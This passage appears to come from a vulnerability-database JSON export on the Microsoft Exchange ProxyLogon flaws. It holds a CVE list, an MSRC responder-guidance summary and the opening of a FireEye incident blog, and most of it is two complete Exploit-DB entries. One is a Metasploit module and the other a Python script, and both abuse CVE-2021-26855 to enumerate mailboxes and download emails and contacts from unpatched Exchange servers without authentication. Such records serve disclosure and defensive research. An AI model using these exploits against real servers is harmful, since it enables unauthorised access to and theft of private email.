"CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26887", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-26902", "CVE-2021-27047", "CVE-2021-27048", "CVE-2021-27049", "CVE-2021-27050", "CVE-2021-27051", "CVE-2021-27052", "CVE-2021-27053", "CVE-2021-27054", "CVE-2021-27055", "CVE-2021-27056", "CVE-2021-27057", "CVE-2021-27058", "CVE-2021-27059", "CVE-2021-27060", "CVE-2021-27061", "CVE-2021-27062", "CVE-2021-27063", "CVE-2021-27065", "CVE-2021-27066", "CVE-2021-27070", "CVE-2021-27074", "CVE-2021-27075", "CVE-2021-27076", "CVE-2021-27077", "CVE-2021-27078", "CVE-2021-27080", "CVE-2021-27081", "CVE-2021-27082", "CVE-2021-27083", "CVE-2021-27084", "CVE-2021-27085"], "modified": "2021-03-09T22:13:03", "id": "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "href": "https://blog.rapid7.com/2021/03/09/patch-tuesday-march-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-05-13T17:37:55", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-21T00:00:00", "type": "exploitdb", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-26855", "CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-05-21T00:00:00", "id": "EDB-ID:49895", "href": "https://www.exploit-db.com/exploits/49895", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)\r\n# Date: 2021-03-02\r\n# Exploit Author: RAMELLA S\u00e9bastien\r\n# Vendor Homepage: https://microsoft.com\r\n# Version: This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\r\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\r\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\r\n# Tested on: Microsoft Windows 2012 R2 - Exchange 2016\r\n\r\n##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n# begin auxiliary class\r\nclass MetasploitModule < Msf::Auxiliary\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'Microsoft Exchange ProxyLogon Collector',\r\n 'Description' => %q{\r\n This module scan for a vulnerability on Microsoft Exchange Server that\r\n allows an attacker bypassing the authentication and impersonating as the\r\n admin (CVE-2021-26855).\r\n\r\n By chaining this bug with another post-auth arbitrary-file-write\r\n vulnerability to get code execution (CVE-2021-27065).\r\n\r\n As a result, an unauthenticated attacker can execute arbitrary commands on\r\n Microsoft Exchange Server.\r\n\r\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\r\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\r\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\r\n\r\n All components are vulnerable by default.\r\n },\r\n 'Author' => [\r\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise)\r\n ],\r\n 'References' => [\r\n ['CVE', '2021-26855'],\r\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\r\n ['URL', 'https://proxylogon.com/'],\r\n ['URL', 'https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse'],\r\n ['URL', 'http://aka.ms/exchangevulns']\r\n ],\r\n 'DisclosureDate' => '2021-03-02',\r\n 'License' => MSF_LICENSE,\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['ProxyLogon']\r\n }\r\n )\r\n )\r\n\r\n register_options([\r\n OptString.new('EMAIL', [true, 'The email account what you want dump']),\r\n OptString.new('FOLDER', [true, 'The email folder what you want dump', 'inbox']),\r\n OptString.new('SERVER_NAME', [true, 'The name of secondary internal Exchange server targeted'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptInt.new('MaxEntries', [false, 'Override the maximum number of object to dump', 512])\r\n ])\r\n end\r\n\r\n XMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze\r\n\r\n def grab_contacts\r\n response = send_xml(soap_findcontacts)\r\n xml = Nokogiri::XML.parse(response.body)\r\n\r\n data = xml.xpath('//t:Contact', XMLNS)\r\n if data.empty?\r\n print_status(' - the user has no contacts')\r\n else\r\n write_loot(data.to_s)\r\n end\r\n end\r\n\r\n def grab_emails(total_count)\r\n # get the emails list of the target folder.\r\n response = send_xml(soap_maillist(total_count))\r\n xml = Nokogiri::XML.parse(response.body)\r\n\r\n # iteration to download the emails.\r\n xml.xpath('//t:ItemId', XMLNS).each do |item|\r\n print_status(\" - download item: #{item.values[1]}\")\r\n response = send_xml(soap_download(item.values[0], item.values[1]))\r\n xml = Nokogiri::XML.parse(response.body)\r\n\r\n message = xml.at_xpath('//t:MimeContent', XMLNS).content\r\n write_loot(Rex::Text.decode_base64(message))\r\n end\r\n end\r\n\r\n def send_xml(data)\r\n uri = normalize_uri('ecp', 'temp.js')\r\n\r\n received = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'cookie' => \"X-BEResource=#{datastore['SERVER_NAME']}/EWS/Exchange.asmx?a=~3;\",\r\n 'ctype' => 'text/xml; charset=utf-8',\r\n 'data' => data\r\n )\r\n fail_with(Failure::Unknown, 'Server did not respond in an expected way') unless received\r\n\r\n received\r\n end\r\n\r\n def soap_download(id, change_key)\r\n <<~SOAP\r\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:GetItem>\r\n <m:ItemShape>\r\n <t:BaseShape>IdOnly</t:BaseShape>\r\n <t:IncludeMimeContent>true</t:IncludeMimeContent>\r\n </m:ItemShape>\r\n <m:ItemIds>\r\n <t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" />\r\n </m:ItemIds>\r\n </m:GetItem>\r\n </soap:Body>\r\n </soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def soap_findcontacts\r\n <<~SOAP\r\n <?xml version='1.0' encoding='utf-8'?>\r\n <soap:Envelope\r\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\r\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\r\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\r\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\r\n <soap:Body>\r\n <m:FindItem Traversal='Shallow'>\r\n <m:ItemShape>\r\n <t:BaseShape>AllProperties</t:BaseShape>\r\n </m:ItemShape>\r\n <m:IndexedPageItemView MaxEntriesReturned=\"#{datastore['MaxEntries']}\" Offset=\"0\" BasePoint=\"Beginning\" />\r\n <m:ParentFolderIds>\r\n <t:DistinguishedFolderId Id='contacts'>\r\n <t:Mailbox>\r\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:ParentFolderIds>\r\n </m:FindItem>\r\n </soap:Body>\r\n </soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def soap_mailnum\r\n <<~SOAP\r\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:GetFolder>\r\n <m:FolderShape>\r\n <t:BaseShape>Default</t:BaseShape>\r\n </m:FolderShape>\r\n <m:FolderIds>\r\n <t:DistinguishedFolderId Id=\"#{datastore['FOLDER']}\">\r\n <t:Mailbox>\r\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:FolderIds>\r\n </m:GetFolder>\r\n </soap:Body>\r\n </soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def soap_maillist(max_entries)\r\n <<~SOAP\r\n <?xml version='1.0' encoding='utf-8'?>\r\n <soap:Envelope\r\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\r\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\r\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\r\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\r\n <soap:Body>\r\n <m:FindItem Traversal='Shallow'>\r\n <m:ItemShape>\r\n <t:BaseShape>AllProperties</t:BaseShape>\r\n </m:ItemShape>\r\n <m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" />\r\n <m:ParentFolderIds>\r\n <t:DistinguishedFolderId Id='#{datastore['FOLDER']}'>\r\n <t:Mailbox>\r\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:ParentFolderIds>\r\n </m:FindItem>\r\n </soap:Body>\r\n </soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def write_loot(data)\r\n loot_path = store_loot('', 'text/plain', datastore['RHOSTS'], data, '', '')\r\n print_good(\" - file saved to #{loot_path}\")\r\n end\r\n\r\n def run\r\n # get the informations about the targeted user account.\r\n response = send_xml(soap_mailnum)\r\n if response.body =~ /Success/\r\n print_status('Connection to the server is successful')\r\n print_status(\" - selected account: #{datastore['EMAIL']}\\n\")\r\n\r\n # grab contacts.\r\n print_status('Attempt to dump contacts list for this user')\r\n grab_contacts\r\n\r\n print_line\r\n\r\n # grab emails.\r\n print_status('Attempt to dump emails for this user')\r\n xml = Nokogiri::XML.parse(response.body)\r\n folder_id = xml.at_xpath('//t:FolderId', XMLNS).values\r\n print_status(\" - selected folder: #{datastore['FOLDER']} (#{folder_id[0]})\")\r\n\r\n total_count = xml.at_xpath('//t:TotalCount', XMLNS).content\r\n print_status(\" - number of email found: #{total_count}\")\r\n\r\n if total_count.to_i > datastore['MaxEntries']\r\n print_warning(\" - number of email recaluled due to max entries: #{datastore['MaxEntries']}\")\r\n total_count = datastore['MaxEntries'].to_s\r\n end\r\n grab_emails(total_count)\r\n end\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/download/49895", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-13T17:38:01", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-18T00:00:00", "type": "exploitdb", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-26855", "CVE-2021-26855"], "modified": "2021-05-18T00:00:00", "id": "EDB-ID:49879", "href": "https://www.exploit-db.com/exploits/49879", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download\r\n# Date: 03-11-2021\r\n# Exploit Author: Gonzalo Villegas a.k.a Cl34r\r\n# Vendor Homepage: https://www.microsoft.com/\r\n# Version: OWA Exchange 2013 - 2019\r\n# Tested on: OWA 2016\r\n# CVE : CVE-2021-26855\r\n# Details: checking users mailboxes and automated downloads of emails\r\n\r\nimport requests\r\nimport argparse\r\nimport time\r\n\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\n__proxies__ = {\"http\": \"http://127.0.0.1:8080\",\r\n \"https\": \"https://127.0.0.1:8080\"} # for debug on proxy\r\n\r\n\r\n# needs to specifies mailbox, will return folder Id if account exists\r\npayload_get_folder_id = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:GetFolder>\r\n <m:FolderShape>\r\n <t:BaseShape>AllProperties</t:BaseShape>\r\n </m:FolderShape>\r\n <m:FolderIds>\r\n <t:DistinguishedFolderId Id=\"inbox\">\r\n <t:Mailbox>\r\n <t:EmailAddress>{}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:FolderIds>\r\n </m:GetFolder>\r\n </soap:Body>\r\n </soap:Envelope>\r\n\r\n\"\"\"\r\n# needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails)\r\npayload_get_items_id_folder = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:FindItem Traversal=\"Shallow\">\r\n <m:ItemShape>\r\n <BaseShape>AllProperties</BaseShape></m:ItemShape>\r\n <SortOrder/>\r\n <m:ParentFolderIds>\r\n <t:FolderId Id=\"{}\" ChangeKey=\"{}\"/>\r\n </m:ParentFolderIds>\r\n <QueryString/>\r\n </m:FindItem>\r\n </soap:Body>\r\n</soap:Envelope>\r\n\"\"\"\r\n\r\n# needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox\r\npayload_get_mail = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <GetItem xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" Traversal=\"Shallow\">\r\n <ItemShape>\r\n <t:BaseShape>Default</t:BaseShape>\r\n </ItemShape>\r\n <ItemIds>\r\n <t:ItemId Id=\"{}\" ChangeKey=\"{}\"/>\r\n </ItemIds>\r\n </GetItem>\r\n </soap:Body>\r\n </soap:Envelope>\r\n\"\"\"\r\n\r\n\r\ndef getFQDN(url):\r\n print(\"[*] Getting FQDN from headers\")\r\n rs = requests.post(url + \"/owa/auth.owa\", verify=False, data=\"evildata\")\r\n if \"X-FEServer\" in rs.headers:\r\n return rs.headers[\"X-FEServer\"]\r\n else:\r\n print(\"[-] Can't get FQDN \")\r\n exit(0)\r\n\r\n\r\ndef extractEmail(url, uri, user, fqdn, content_folderid, path):\r\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": \"Mozilla pwner\"}\r\n from xml.etree import ElementTree as ET\r\n dom = ET.fromstring(content_folderid)\r\n for p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'):\r\n id_folder = p[0].attrib.get(\"Id\")\r\n change_key_folder = p[0].attrib.get(\"ChangeKey\")\r\n data = payload_get_items_id_folder.format(id_folder, change_key_folder)\r\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\r\n rs = requests.post(url + uri, data=data, headers=headers, verify=False)\r\n if \"ErrorAccessDenied\" in rs.text:\r\n print(\"[*] Denied ;(.. retrying\")\r\n t_uri = uri.split(\"/\")[-1]\r\n for ru in random_uris:\r\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\r\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\r\n if \"NoError\" in rs.text:\r\n print(\"[+] data found, dowloading email\")\r\n break\r\n print(\"[+]Getting mails...\")\r\n dom_messages = ET.fromstring(rs.text)\r\n messages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items')\r\n for m in messages:\r\n id_message = m[0].attrib.get(\"Id\")\r\n change_key_message = m[0].attrib.get(\"ChangeKey\")\r\n data = payload_get_mail.format(id_message, change_key_message)\r\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\r\n rs = requests.post(url + uri, data=data, headers=headers, verify=False)\r\n if \"ErrorAccessDenied\" in rs.text:\r\n print(\"[*] Denied ;(.. retrying\")\r\n t_uri = uri.split(\"/\")[-1]\r\n for ru in random_uris:\r\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\r\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\r\n if \"NoError\" in rs.text:\r\n print(\"[+] data found, downloading email\")\r\n break\r\n\r\n try:\r\n f = open(path + \"/\" + user.replace(\"@\", \"_\").replace(\".\", \"_\")+\"_\"+change_key_message.replace(\"/\", \"\").replace(\"\\\\\", \"\")+\".xml\", 'w+')\r\n f.write(rs.text)\r\n f.close()\r\n except Exception as e:\r\n print(\"[!] Can't write .xml file to path (email): \", e)\r\n\r\n\r\ndef checkURI(url, fqdn):\r\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": \"Mozilla hehe\"}\r\n arr_uri = [\"//ecp/xxx.js\", \"/ecp/favicon.ico\", \"/ecp/auth.js\"]\r\n for uri in arr_uri:\r\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(\"thisisnotanvalidmail@pwn.local\"),\r\n headers=headers)\r\n #print(rs.content)\r\n if rs.status_code == 200 and \"MessageText\" in rs.text:\r\n print(\"[+] Valid URI:\", uri)\r\n calculated_domain = rs.headers[\"X-CalculatedBETarget\"].split(\".\")\r\n if calculated_domain[-2] in (\"com\", \"gov\", \"gob\", \"edu\", \"org\"):\r\n calculated_domain = calculated_domain[-3] + \".\" + calculated_domain[-2] + \".\" + calculated_domain[-1]\r\n else:\r\n calculated_domain = calculated_domain[-2] + \".\" + calculated_domain[-1]\r\n return uri, calculated_domain\r\n #time.sleep(1)\r\n print(\"[-] No valid URI found ;(\")\r\n exit(0)\r\n\r\n\r\ndef checkEmailBoxes(url, uri, user, fqdn, path):\r\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": \"Mozilla hehe\"}\r\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user),\r\n headers=headers)\r\n #time.sleep(1)\r\n #print(rs.content)\r\n if \"ResponseCode\" in rs.text and \"ErrorAccessDenied\" in rs.text:\r\n print(\"[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable\".format(user))\r\n if \"ResponseCode\" in rs.text and \"NoError\" in rs.text:\r\n print(\"[+] Valid Email Found!: {}\".format(user))\r\n extractEmail(url, uri, user, fqdn, rs.text, path)\r\n if \"ResponseCode\" in rs.text and \"ErrorNonExistentMailbox\" in rs.text:\r\n print(\"[-] Not Valid Email: {}\".format(user))\r\n\r\n\r\ndef main():\r\n __URL__ = None\r\n __FQDN__ = None\r\n __mailbox_domain__ = None\r\n __path__ = None\r\n print(\"[***** OhhWAA *****]\")\r\n parser = argparse.ArgumentParser(usage=\"Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>\")\r\n parser.add_argument('-u', \"--url\", help=\"Url, provide schema and not final / (eg https://example.org)\", required=True)\r\n parser.add_argument('-l', \"--list\", help=\"Users mailbox list\", required=True)\r\n parser.add_argument(\"-p\", \"--path\", help=\"Path to write emails in xml format\", required=True)\r\n parser.add_argument('-f', \"--fqdn\", help=\"FQDN\", required=False, default=None)\r\n parser.add_argument(\"-d\", \"--domain\", help=\"Domain to check mailboxes (eg if .local dont work)\", required=False, default=None)\r\n args = parser.parse_args()\r\n __URL__ = args.url\r\n __FQDN__ = args.fqdn\r\n __mailbox_domain__ = args.domain\r\n __list_users__ = args.list\r\n __valid_users__ = []\r\n __path__ = args.path\r\n if not __FQDN__:\r\n __FQDN__ = getFQDN(__URL__)\r\n print(\"[+] Got FQDN:\", __FQDN__)\r\n\r\n valid_uri, calculated_domain = checkURI(__URL__, __FQDN__)\r\n\r\n if not __mailbox_domain__:\r\n __mailbox_domain__ = calculated_domain\r\n\r\n list_users = open(__list_users__, \"r\")\r\n for user in list_users:\r\n checkEmailBoxes(__URL__, valid_uri, user.strip()+\"@\"+__mailbox_domain__, __FQDN__, __path__)\r\n\r\n print(\"[!!!] FINISHED OhhWAA\")\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/49879", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "msrc": [{"lastseen": "2021-03-16T18:53:05", "description": "This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065. Microsoft will continue to monitor these threats and provide updated tools and investigation guidance to help organizations defend against, identify, and remediate associated attacks.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T18:44:28", "type": "msrc", "title": "Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T18:44:28", "id": "MSRC:ED939F90BDE8D7A32031A750388B03C9", "href": "https://msrc-blog.microsoft.com/2021/03/16/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-10-11T12:35:13", "description": "Beginning in January 2021, Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment. The observed activity included creation of web shells for persistent access, remote code execution, and reconnaissance for endpoint security solutions. Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM, a privileged local account on the Windows operating system. Furthermore, the process that created the web shell was UMWorkerProcess.exe, the process responsible for Exchange Server\u2019s Unified Messaging Service. In subsequent investigations, we observed malicious files created by w3wp.exe, the process responsible for the Exchange Server web front-end.\n\nIn response to this activity, we built threat hunting campaigns designed to identify additional Exchange Server abuse. We also utilized this data to build higher-fidelity detections of web server process chains. On March 2, 2021, Microsoft released a [blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) that detailed multiple zero-day vulnerabilities used to attack on-premises versions of Microsoft Exchange Server. Microsoft also issued emergency Exchange Server updates for the following vulnerabilities:\n\n**CVE**\n\n| \n\n**Risk Rating**\n\n| \n\n**Access Vector**\n\n| \n\n**Exploitability**\n\n| \n\n**Ease of Attack**\n\n| \n\n**Mandiant Intel** \n \n---|---|---|---|---|--- \n \n**CVE-2021-26855**\n\n| \n\nCritical\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004941>) \n \n**CVE-2021-26857**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004938>) \n \n**CVE-2021-26858**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004944>) \n \n**CVE-2021-27065**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004939>) \n \nTable 1: List of March 2021 Microsoft Exchange CVEs and FireEye Intel Summaries\n\nThe activity reported by Microsoft aligns with our observations. **FireEye currently tracks this activity in three clusters, UNC2639, UNC2640, and UNC2643. We anticipate additional clusters as we respond to intrusions.** We recommend following Microsoft\u2019s guidance and patching Exchange Server immediately to mitigate this activity.\n\nBased on our telemetry, we have identified an array of affected victims including US-based retailers, local governments, a university, and an engineering firm. Related activity may also include a Southeast Asian government and Central Asian telecom. [Microsoft reported](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) the exploitation occurred together and is linked to a single group of actors tracked as \u201cHAFNIUM\u201d, a group that has previously targeted the US-based defense companies, law firms, infectious disease researchers, and think tanks.\n\nIn this blog post, we will detail our observations on the active investigations we are currently performing. As our experience with and knowledge of this threat actor grows, we will update this post or release new technical details as appropriate. For our Managed Defense Customers, we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity.\n\nWe will be discussing these attacks more in an [upcoming webinar on Mar. 17, 2021](<https://www.brighttalk.com/webcast/7451/475010?utm_source=FireEye&utm_medium=brighttalk&utm_campaign=475010>).\n\n#### From Exploit to Web Shell\n\nBeginning in January 2021, Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer\u2019s environment. The web shell, named help.aspx (MD5: 4b3039cf227c611c45d2242d1228a121), contained code to identify the presence of (1) FireEye xAgent, (2) CarbonBlack, or (3) CrowdStrike Falcon endpoint products and write the output of discovery. Figure 1 provides a snippet of the web shell\u2019s code.\n\n\n\n \nFigure 1: Snippet of the web shell help.aspx, crafted to identify the presence of endpoint security software on a victim system\n\nThe web shell was written to the system by the 